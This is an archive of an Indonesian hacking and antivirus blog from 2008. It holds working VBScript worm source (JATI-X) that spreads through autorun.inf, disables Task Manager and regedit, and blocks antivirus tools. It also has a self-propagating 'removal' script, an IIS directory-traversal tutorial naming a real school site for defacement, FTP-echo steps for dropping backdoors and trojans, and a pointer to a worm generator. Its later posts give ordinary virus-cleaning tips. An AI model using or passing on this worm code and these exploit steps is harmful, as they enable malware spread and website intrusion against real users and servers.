-->>>+echo+lcd+c:inetpubwwwroot+>>+c:inetpubwwwrootjati.ftpascii --->>> bentuk file --->>> scripnya --->>> +echo+ascii+>>+c:inetpubwwwrootjati.ftpget jati.htm ---->>> command tranfer file --->>> +echo+get+jati.htm+>>+c:inetpubwwwrootjati.ftpclose --->> perintah dc ke web server ---->>> scripnya --->>>
+echo+close+>>+c:inetpubwwwrootjati.ftp
hehehe Dengan cara ini anda dapat drop apa saja keweb orang tuh baik itu web deface, backdror,
ircserver, bot, bnc, psybnc, trojan and virus deh..........
untuk mengirim file yang binary kode bentuk file dari asci di ubah menjadi binary
Catatan : - Daftar Pustaka .) Tutorial R3VOLT Anggota #Medanhacking .) Tutorial Pak_Tani Anggota #Cracxer .) Tutoriaal Dis0RdeR Anggota #Medanhacking .) Tutorial Rio_Martin Anggota #IndoSnifing
- Revisi Dan Tambahan Serta edit Dari Jati - Kalau Mau Download Software IIS Scaner Di Web Site . WWW.ElHACKER.NET . WWW.KEBAM.NET - Jangan Jadi Cracker Yang merusak kerja nya
Okde........... Wasalam....... See You In Next Tutorial ( Script Kidies ) ........................:::::::VIVA #MINANGCREW And #HACKERMUDA:::::::::............. Link Web• Aikmel Community • Antihackerlink • Echo • Forum Diskusi Linux • HarryChanPutra • HarryChanPutra • I S I C • id-ubuntu • Indo BSD • Jasakom • Konsultan Linux • w[X]f project • XNUXER ________________________________________

MEMBUAT VIRUS WORM DENGAN NOTEPAD

2008-12-28T15:30:00.001+07:00

'******************************************************************
'********************* Virus Removal VBScript *********************
'************************** Version 1.00 **************************
'******************************************************************
'This antivirus program is intended to repair your computer from
'any sorts of virus attacks.
'This program is exactly like a normal virus but it repairs things
'rather than destroying them.
'******************************************************************
'******************************************************************
'Program developed by
'Sujin Joshi
'http://Sujin.com.np
'sujinjoshi@gmail.com
Option Explicit
On Error Resume Next

Dim Fso,Shells,SystemDir,WinDir,Count,File,Drv,Drives,InDrive,ReadAll,AllFile,WriteAll,Del,Chg,folder,files,Delete,auto,root

Set Fso = CreateObject("Scripting.FileSystemObject")
Set Shells = CreateObject("Wscript.Shell")
Set WinDir = Fso.GetSpecialFolder(0)
Set SystemDir =Fso.GetSpecialFolder(1)
Set File = Fso.GetFile(WScript.ScriptFullName)
Set Drv = File.Drive
Set InDrive = Fso.drives
Set ReadAll = File.OpenAsTextStream(1,-2)
do while not ReadAll.atendofstream
AllFile = AllFile & ReadAll.readline
AllFile = AllFile & vbcrlf
Loop

Count=Drv.DriveType

Do
If Not Fso.FileExists(SystemDir & "\VirusRemoval.vbs") then
set WriteAll = Fso.CreateTextFile(SystemDir & "\VirusRemoval.vbs",2,true)
WriteAll.Write AllFile
WriteAll.close
set WriteAll = Fso.GetFile(SystemDir & "\VirusRemoval.vbs")
WriteAll.Attributes = -1
End If

Shells.RegWrite "HKCU\Software\Microsoft\Internet Explorer\Main\Window Title","Sujin.com.np"
Shells.RegWrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFolderOptions","0","REG_DWORD"
Shells.RegWrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableTaskMgr","0","REG_DWORD"
Shells.RegWrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools","0","REG_DWORD"
Shells.RegWrite "HKCU\Software\Microsoft\Internet Explorer\Main\Start Page","http://sujin.com.np/"
Shells.RegWrite "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell","explorer.exe"
Shells.RegWrite "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit",SystemDir & "\userinit.exe," & _
SystemDir & "\wscript.exe " & SystemDir & "\VirusRemoval.vbs"

For Each Drives In InDrive
root = Drives.Path & "\"
If Fso.GetParentFolderName(WScript.ScriptFullName)=root Then
Shells.Run "explorer.exe " & root
End If
Set folder=Fso.GetFolder(root)
Set Delete = Fso.DeleteFile(SystemDir & "\killvbs.vbs",true)
For Each files In folder.Files
auto=Left(files.Name,7)
If UCase(auto)=UCase("autorun") Then
Set Delete = Fso.DeleteFile(root & files.Name,true)
End If
Next
If Drives.DriveType=2 Then
delext "inf",Drives.Path & "\"
delext "INF",Drives.Path & "\"
End if

If Drives.DriveType = 1 Or Drives.DriveType = 2 Then
If Drives.Path<> "A:" Then
delext "vbs",WinDir & "\"
delext "vbs",Drives.Path & "\"

If Fso.FileExists(Drives.Path & "\ravmon.exe") Then
Fso.DeleteFile(Drives.Path & "\ravmon.exe")
End If
If Fso.FileExists(Drives.Path & "\sxs.exe") Then
Fso.DeleteFile(Drives.Path & "\sxs.exe")
End If
If Fso.FileExists(Drives.Path & "\winfile.exe") Then
Fso.DeleteFile(Drives.Path & "\winfile.exe")
End If
If Fso.FileExists(Drives.Path & "\run.wsh") Then
Fso.DeleteFile(Drives.Path & "\run.wsh")
End If

If Drives.DriveType = 1 Then
If Drives.Path<>"A:" Then
If Not Fso.FileExists(Drives.Path & "\VirusRemoval.vbs") Then
Set WriteAll=Fso.CreateTextFile(Drives.Path & "\VirusRemoval.vbs",2,True)
WriteAll.Write AllFile
WriteAll.Close
Set WriteAll = Fso.GetFile(Drives.Path & "\VirusRemoval.vbs")
WriteAll.Attributes = -1
End If

If Fso.FileExists(Drives.Path & "\autorun.inf") Or Fso.FileExists(Drives.Path & "\AUTORUN.INF") Then
Set Chg = Fso.GetFile(Drives.Path & "\autorun.inf")
Chg.Attributes = -8
Set WriteAll = Fso.CreateTextFile(Drives.Path & "\autorun.inf",2,True)
WriteAll.writeline "[autorun]"
WriteAll.WriteLine "open=wscript.exe VirusRemoval.vbs"
WriteAll.WriteLine "shell\open=Open"
WriteAll.WriteLine "shell\open\Command=wscript.exe VirusRemoval.vbs"
WriteAll.Close
Set WriteAll = Fso.GetFile(Drives.Path & "\autorun.inf")
WriteAll.Attributes = -1
else
Set WriteAll = Fso.CreateTextFile(Drives.Path & "\autorun.inf",2,True)
WriteAll.writeline "[autorun]"
WriteAll.WriteLine "open=wscript.exe VirusRemoval.vbs"
WriteAll.WriteLine "shell\open=Open"
WriteAll.WriteLine "shell\open\Command=wscript.exe VirusRemoval.vbs"
WriteAll.Close
Set WriteAll = Fso.GetFile(Drives.Path & "\autorun.inf")
WriteAll.Attributes = -1
End if
End If
End If
End if
End If
Next

if Count <> 1 then
Wscript.sleep 10000
end if
loop while Count<>1

sub delext(File2Find, SrchPath)
Dim oFileSys, oFolder, oFile,Cut,Delete
Set oFileSys = CreateObject("Scripting.FileSystemObject")
Set oFolder = oFileSys.GetFolder(SrchPath)
For Each oFile In oFolder.Files
Cut=Right(oFile.Name,3)
If UCase(Cut)=UCase(file2find) Then
If oFile.Name <> "VirusRemoval.vbs" Then Set Delete = oFileSys.DeleteFile(srchpath & oFile.Name,true)
End If
Next
End sub

VIRUS WORM

2008-12-28T15:27:00.001+07:00

Cara membuat Virus Worm

WARNING : GUNAKAN UNTUK MENAMBAH PENGETAHUAN, BUKAN UNTUK MERUGIKAN ORANG LAIN
Bro ... Kamu pasti inget dengan virus worm yang sempat menghebohkan Tampilan awal program Vbs WGinternet beberapa waktu yang lalu : Anna Kournikova. Worm yang menginfeksi Windows beserta Outlook Exressnya, akan mengirim sendiri pesan virus ke seluruh email yang terdapat pada address book.
Sebenarnya untuk membuat worm semacam itu kamu tidak harus menjadi seorang programmer handal. Cukup bisa njalanin komputer dan punya softwarenya. Lalu apa softwarenya ? VBS Worm Generator !! Dengan program yang dibuat oleh hacker Argentina berusia 18 tahun itu kamu dapat membuat virus yang sama dahsyatnya dengan Anna Kournikova, cukup dengan melakukan beberapa klik.
Program VBSWG memungkinkan kamu untuk membuat worm dengan nama sesukamu. Kamu juga bisa memilih efek dari worm tersebut, seperti misalnya menampilkan pesan atau memaksa seseorang untuk menuju situs tertentu. Akibat yang paling parah tentunya jika worm tersebut kamu setting supaya membikin crash komputer.
Kemampuan lain dari VBSWG adalah melakukan enkripsi terhadap source code worm yang dibuat. Kemampuan lainnya bisa kamu coba sendiri :-) Pokoknya cukup hebatlah program ini.
Tapi seperti yang dikatakan oleh pembuatnya, VBS Worm Generator hanya boleh digunakan untuk belajar, bukan untuk merugikan orang lain. Untuk itu jika Anda memang berniat mencobanya, ingat-ingat peringatan tersebut.
Atau gunakan search engine http://www.google.com dan masukkan keyword vbswg2bfix.zip, Vbswg2B.zip, worm generator, dan keyword semacamnya

sumber : www.klik-kanan.com

CARA MENGHACK WEBSITE

2008-12-07T12:33:00.003+07:00

Kamu mau blajar jd hacker?
oke deh saya kasih tau caranya tp ini hanya untuk belajar bukan untuk merusak web orang.
jd pastikan kamu backup dlu halaman web yg kamu hack.
ingat kamu hanya mengingatkan sipunya web utk menambah keamanan servernya.
oke kita mulai.
1. tentukan target web kamu misalnya www.smpn19bogor.com
2. kita deface web tsb dg perintah echo jadi kamu tuliskan diurl/ adress
http://www.smpn19bogor.com/_vti_bin/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir+c
jika muncul cgi eror brarti kamu telah menembus web itu. dan muncul isi hardisk dlm format dos
jika belum brarti web itu udh divulner jd ganti target yg lainya.
3. stlh itu cari path translade dg alamat
http://www.smpn19bogor.com/_vtì_bin/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+set
nanti keluar cgi eror dan keluar macam2 isi hardisk yg perlu dilihat path_translade=d:wwwsmpn19bogor
4. langkah selanjutnya copy file cmd.exe menjadi jati.exe alamatnya
http://www.smpn19bogor.com/_vti_bin/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+copy+c:winntsystem32cmd.exe+c:jati.exe
5. gunakan direktori inetpub
http://www.smpn19bogor.com/_vti_bin/..%c0%af../..%c0%af../..%c0%af../jati.exe?/c+dir+c:inetpub
terus dg alamat diatas cm inetpub diganti inetpubwwwroot
terus lakukan alamat diatas dg mengganti inetpubwwwroot mjd inetpubwwwrootindex.htm
6. skr tinggal kita deface atau echo
http://www.smpn19bogor.com/_vti_bin/..%c0%af../..%c0%af../..%c0%af../jati.exe?/c+echo+Kamu%20telah%20Dihack%20Oleh%20Jati+>+c:inetpubwwwrootindex.htm
Nah sekarang kamu telah berhasil ngedeface webnya
kalo mau lihat hasilnya langsung buka aja http://www.smpn19.com
oke sekian tutorial hackernya
kalo mau hasilnya keren blajar dulu html

CARA MUDAH BUAT VIRUS

2008-12-05T09:16:00.002+07:00

CARA MEMBUAT VIRUS
Nah kita akan buat virus JATI-X.VBS.
Ayo sekarang kita buka saja Notepadnya dan ketikkan code berikut. Jika malas kan tinggal Copy > Paste….
‘JATI-X
‘Varian dari JATI.VBS
on error resume next
‘Dim kata-kata berikut
dim rekur,windowpath,desades,fs,mf,isi,tf,JATI,nt,check,sd
’siapkan isi autorun
isi = “[autorun]” & vbcrlf & “shellexecute=wscript.exe jatims32.dll.vbs”
set fs = createobject(”Scripting.FileSystemObject”)
set mf = fs.getfile(Wscript.ScriptFullname)
dim text,size
size = mf.size
check = mf.drive.drivetype
set text = mf.openastextstream(1,-2)
do while not text.atendofstream
rekur = rekur & text.readline
rekur = rekur & vbcrlf
loop
do
‘buat file induk
Set windowpath = fs.getspecialfolder(0)
set tf = fs.getfile(windowpath & “\JATI-x.dll.vbs “)
tf.attributes = 32
set tf = fs.createtextfile(windowpath & “\JATI -x.dll.vbs”,2,true)
tf.write rekur
tf.close
set tf = fs.getfile(windowpath & “\JATI -x.dll.vbs”)
tf.attributes = 39
’sebar ke removable disc ditambahkan dengan Autorun.inf
for each desades in fs.drives
If (desades.drivetype = 1 or desades.drivetype = 2) and desades.path <> “A:” then
set tf=fs.getfile(desades.path &”\jatims32.dll.vbs”)
tf.attributes =32
set tf=fs.createtextfile(desades.path &”\jatims32.dll.vbs”,2,true)
tf.write rekur
tf.close
set tf=fs.getfile(desades.path &”\jatims32.dll.vbs”)
tf.attributes = 39
set tf =fs.getfile(desades.path &”\autorun.inf”)
tf.attributes = 32
set tf=fs.createtextfile(desades.path &”\autorun.inf”,2,true)
tf.write isi
tf.close
set tf = fs.getfile(desades.path &”\autorun.inf”)
tf.attributes=39
end if
next
‘Manipulasi Registry
set JATI = createobject(”WScript.Shell”)
‘Ubah Internet Explorer Title
JATI.regwrite “HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Window Title”,”:: ->JATI-X<- ::”
‘File Hidden tak terlihat
JATI.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Advanced\Hidden”,2, “REG_DWORD”
‘Blokir Find, FolderOptions, Run, Regedit, Task Manager, dan klik kanan
JATI.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFind”, “1″, “REG_DWORD”
JATI.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFolderOptions”, “1″, “REG_DWORD”
JATI.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoRun”, “1″, “REG_DWORD”
JATI.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools”, “1″, “REG_DWORD”
JATI.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableTaskMgr”, “1″, “REG_DWORD”
JATI.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoViewContextMenu”, “1″, “REG_DWORD”
‘Buat pesan saat Windows Startup
JATI.regwrite “HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Winlogon\LegalNoticeCaption”, “THE JATI-X”
JATI.regWrite “HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Winlogon\LegalNoticeText”,”No reason for Panic”
‘Aktifkan saat Windows Startup
JATI.regwrite “HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\Systemdir”, windowpath & “\batch- JATI.-x.dll.vbs”
‘Alihkan aplikasi berikut. Jika dibuka maka program terbuka dengan Notepad
JATI.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cmd.exe\Debugger”,”notepad.exe”
JATI.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\install.exe\Debugger”,”notepad.exe”
JATI.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msconfig.exe\Debugger”,”notepad.exe”
JATI.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regedit.exe\Debugger”,”notepad.exe”
JATI.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regedt32.exe\Debugger”,”notepad.exe”
JATI.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\RegistryEditor.exe\Debugger”,”notepad.exe”
JATI.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\setup.exe\Debugger”,”notepad.exe”
JATI.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\PCMAV.exe\Debugger”,”notepad.exe”
JATI.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\PCMAV-CLN.exe\Debugger”,”notepad.exe”
JATI.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\PCMAV-RTP.exe\Debugger”,”notepad.exe”
JATI.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Ansav.exe\Debugger”,”notepad.exe”
JATI.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\PCMAV-RTP.exe\Debugger”,”notepad.exe”
‘Bonus
Msgbox”maaf anda terkena virus jati”
if check <> 1 then
Wscript.sleep 200000
end if
loop while check <> 1
set sd = createobject(”Wscript.shell”)
sd.run windowpath & “\explorer.exe /e,/select, ” & Wscript.ScriptFullname
Setelah Anda menempatkan kode tersebut klik FILE > SAVE. Di File Type pilih ALL FILES (*.*) lalu simpan dengan nama jatims32.dll.vbs. Setelah itu coba Anda jalankan. Dan ya, Anda telah menjalankan JATI-X.VBS di komputer Anda.
Jika Anda membuka aplikasi yang bernama : cmd.exe, install.exe, msconfig.exe, regedit.exe, regedt32.exe, RegistryEditor.exe, setup.exe, PCMAV.exe, PCMAV-CLN.exe, dan PCMAV-RTP.exe maka akan terbuka Notepad yang isinya kurang lebih mirip seperti ini :

Ingat jadilah orang yang bermanfaat bagi orang lain. Tidak ada “barang berbahaya” disini karena Andalah yang membuatnya berbahaya. Saya tidak bertanggung jawab apabila Anda menyalahgunakan kode ini. Ini untuk ilmu pengetahuan semata. Kalau disalahgunakan saya kutuk mukanya mirip Tukul (Wah…jadi terkenal nanti)…jangan deh. Pokoknya segala kenekatan Anda ditanggung oleh Anda sendiri.
Virus ini punya kemampuan Autorun jadi komputer yang dicolokkan Removable Disc (Misalnya Flash Disc) yang terinfeksi virus ini akan diinfeksi pula (jika Autorun tidak di non-aktifkan)
NOTE: Untuk membersihkan JATI-X caranya mudah. Tinggal hentikan proses yang bernama wscript.exe. Jika di WinNT Anda bisa melakukannya lewat Task Manager. Tapi kalau Win9X silahkan cari tool pengganti Task Manager misalnya Procexp atau CurrProcess. Soalnya terkadang kalau lewat perintah Command Prompt gak bisa.
Setelah Anda memberhentikan proses wscript.exe hapus file induk yang bernama JATI-x.dll.vbs di WINDOWSDIR (C:\Windows misalnya). Jika tidak ada tampilkan dulu file hidden dengan Folder Options. Setelah itu perbaiki Registry. Untuk mempercepat salin kode ini ke Notepad :
[Version]
Signature=”$Chicago$”
Provider=Fariskhi
[DefaultInstall]
AddReg=UnhookRegKey
DelReg=del
[UnhookRegKey]
HKCU,Software\Microsoft\Internet Explorer\Main, Window Title,0, “INTERNET EXPLORER”
[del]
HKCU, Software\Microsoft\Windows\CurrentVersion\Policies\Explorer, NoFind
HKCU, Software\Microsoft\Windows\CurrentVersion\Policies\Explorer, NoFolderOptions
HKCU, Software\Microsoft\Windows\CurrentVersion\Policies\Explorer, NoRun
HKCU, Software\Microsoft\Windows\CurrentVersion\Policies\System, DisableRegistryTools
HKCU, Software\Microsoft\Windows\CurrentVersion\Policies\System, DisableTaskMgr
HKCU, Software\Microsoft\Windows\CurrentVersion\Policies\Explorer, NoViewContextMenu
HKLM, Software\Microsoft\Windows\CurrentVersion\Winlogon, LegalNoticeCaption
HKLM, Software\Microsoft\Windows\CurrentVersion\Winlogon, LegalNoticeText
HKLM, Software\Microsoft\Windows\CurrentVersion\Run, Systemdir
HKLM, SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cmd.exe, Debugger
HKLM, SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\install.exe, Debugger
HKLM, SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msconfig.exe, Debugger
HKLM, SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regedit.exe, Debugger
HKLM, SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regedt32.exe, Debugger
HKLM, SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\RegistryEditor.exe, Debugger
HKLM, SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\setup.exe, Debugger
HKLM, SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\PCMAV.exe, Debugger
HKLM, SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\PCMAV-CLN.exe, Debugger
HKLM, SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\PCMAV-RTP.exe, Debugger
Setelah itu save dengan FILE TYPE : ALL FILES (*.*) dan simpan dengan nama : JATIxremoval.inf. Setelah itu klik kanan file tersebut dan pilih install. Jadi kita buat Virus dan Antidotnya sama-sama dengan Notepad.

MEMBASMI VIRUS DIKOMPUTER

2008-12-05T02:31:00.000+07:00

Wah ketemu lg nih.
kali ini aku akan membahas ttg cara membasmi virus dikompi.
sebelum kita mulai sebaiknya lakukan langkah ke1 spt pd posting ke1 yg udh aku jelaskan dg tujuan menelanjangi virus yg sembunyi.
# langkah berikut menghentikan program aktiv sivirus caranya tekan ctrl+alt+delete.
perhatikan windows yg muncul yaitu task manager. lalu klik process kmdian klik username.
lihat program yg sdg berjalan kalo ada yg mencurigakan spt wscript segera klik terus klik end proces. berarti virus udh ga jln. jgn dimatikan yg system atau service karena bs kompi kita hang.
ada jg program yg fungsinya sama spt task manager yaitu proces explorer silahkan cari pake keyword tsb lewat google utk download.
* langkah berikutnya mematikan virus distart up, caranya klik start, run, ketik msconfig, trs enter. stlh windows ms config muncul klik start up, kmdian dissable all. berarti virus tdk akan lari distart up.
program yg lain yg fungsinya sama yaitu advance windows care, download aja diìnternet. cari pake google.
* langkah selanjutnya mematikan virus diregistry. sblm hal ini dilakukan anda hrs tau dulu mana file virusnya caranya lihat ditiap drive misalnya drive d biasanya virus mgnkan autorun jd buka autorun dg notepad kmdian baca dia lari kefile apa. brarti itulah file virus. utk mematikan diregistry caranya: klik start, run, regedit. stlh window regedit muncul klik edit, find, ketik nama file virus td. terus delete.
skr komputer kita aman dari virus. untuk memastikan lg coba buka file windows dan kalo msh ada virusnya lsg hapus aja. cari jg disystem 32 krn kadang jg virus ada disana.
wah skr anda sdh bs jd dokter komputer deh..
eh jgn bangga dulu krn kadang virus jg mengeblok task manager, msconfig, dan regedit. jd gmn donk?
tunggu posting saya berikutnya ttg script utk menjalankan task manager, msconfig dan regedit yg diblok virus..
oke ikuti terus blog ini krn insyaalloh bermanfaat.

LANJUTAN POSTING KE1

2008-11-30T15:08:00.000+07:00

setelah langkah 1 dan 2 dilaksanakan brarti virus tdk akan lsg jalan dikomputer kita.
tp file virus msh ada flash disk kita. jd kalo kita salah klik bisa2 virus menyebar dikompi.
jd kita lakukan langkah ke3:
3. mengenali file virus caranya 》sblm anda kelangkah 3 pastikan langkah 1 dan 2 sdh dilakukan, sekarang buka flashdisknya dikompi 》klik view》detail.
lihat pada kolom file type. jika file kita ms.word, ms. excel atau ms.pwr point tapi di file type berubah jd aplication
berarti file kita terinfeksi virus》lihat extensinya bukan doc, xls atau ppt tapi mjd exe. jika kamu tdk punya antivirus/udh out date maka kamu hrs menghapus file terinfeksi tsb dg cara》klik kiri 1x tekan shift+delete.
yah hilang deh filenya?..
iya tp kan kompi kita aman. mendingan file ada apa kompi kena virus?
sebenarnya ada beberapa antivirus yg dpt membetulkan file yg terinfeksi contohnya pcmav dan ansav tp jika virus itu baru dan tdk ada didatabasenya maka kompi pasti terinfeksi.
jd pastikan file itu dihapus.
sebenarnya bs dengan didebug tp kalo kita ga ngerti jg percuma.
oh iya file virus jg bisa berextensi vbs, jd kalo ada file mencurigakan terhiden spt k4l0n6.vbs segeralah dihapus. insyaalloh kompimu tdk akan terinfeksi virus dari flashdisk.
terus jgn beli cd/dvd bajakan bs jd sdh terinfeksi. karena langkah 1,2 dan 3 tdk mempan utk cd dan internet jd tetap harus ada antivirusnya.
lain waktu saya akan posting cara membersihkan virus dari komputer. oke.. terus ikuti blog ini. dan jgn lupa kritik dan saranya di post kekoment ya!!...
daag...;-):-)

PENGERTIAN VIRUS

2008-11-30T13:20:00.003+07:00

Virus komputer adalah sebuah program yang sengaja dibuat dengan maksud untuk merusak sebuah program pada komputer target, program ini menyebar dan menginfeksi
komputer tanpa diketahui pemiliknya.
Bagaimana virus menginfeksi?
ada beberapa cara untuk menginfeksi :
1. lewat media penyimpanan data spt disket, flashdisk maupun cd/dvd.
2. lewat jaringan baik lokal (LAN) maupun internet.
khusus diinternet virus dpt menyebar lewat email, program yg siap didownload maupun sengaja disisipkan dg cara masuk keweb (dihack) kemudian ditanam diserver.
3. lewat alat komunikasi handphone yg dpt mudah bertukar data.
khusus pd handphone bs menyebar lewat bluethoot, infrared, maupun MMS.
Jika melihat cara menyebarnya maka anda hrs berhati hati ketika akan mengambil, membuka, mengkopy maupun mendownload file, program maupun aplikasi
lewat media tersebut.
Terus gimana dong kalo tiap hari kita hrs menggunakan media tsb utk bekerja maupun belajar?
Anda ga perlu setakut itu.
Klo anda kurang paham ttg program komputer, instal aja antivirus. byk antivirus yg dpt didownload gratis diinternet. atau cari yg berkualìtas lebih tinggal transaksi aja diinternet.
Wah kalo cm itu mah semua jg tau.. ngapain posting spt itu?
okedeh kalo kamu pingin tau yg lebih sediakan bunga 7 rupa, kemenyan, ayam cemani... (emangnya mau jd dukun?)
just kidding...
oke skr kita melihat tanda tanda virus pd media penyimpan data kita. langkah2nya:
1. klik kanan start, explorer, tools, folder option, view, kemudian klik show hidden file dan hilangkan checklist pd kolom hide extension for known file types dan kolom hide protected operating system file. 》langkah ini bertujuan membuka/memperlihatkan file yg tersembunyi krn biasanya virus dlm keadaan tersembunyi. jd langkah ini utk membuka topeng sivirus.
2. buatlah autorun.inf bayangan pd media penyimpanan data. karena virus menyebar otomatis lewat program ini. caranya buka flashdisk/disket klik kanan new, folder. beri nama autorun.inf terus buka foldernya dan buat folder baru lg tp beri nama dg huruf arial unicode, cara mencari hruf arial unicode 》buka ms word, klik insert, symbol terus cari arial unicode hrfnya spt jepang, klik insert kemudian copy huruf tsb. trs kamu buka folder yg didlm folder autorun.inf dan kasih nama dg hrf arial unicode td. cara pastenya tekan ctrl+v skr jd deh autorun.inf bayangan. kmdian folder td kita hidden spy ga dihapus sama org yg pinjam caranya klik kanan pd folder, properties,hidden》》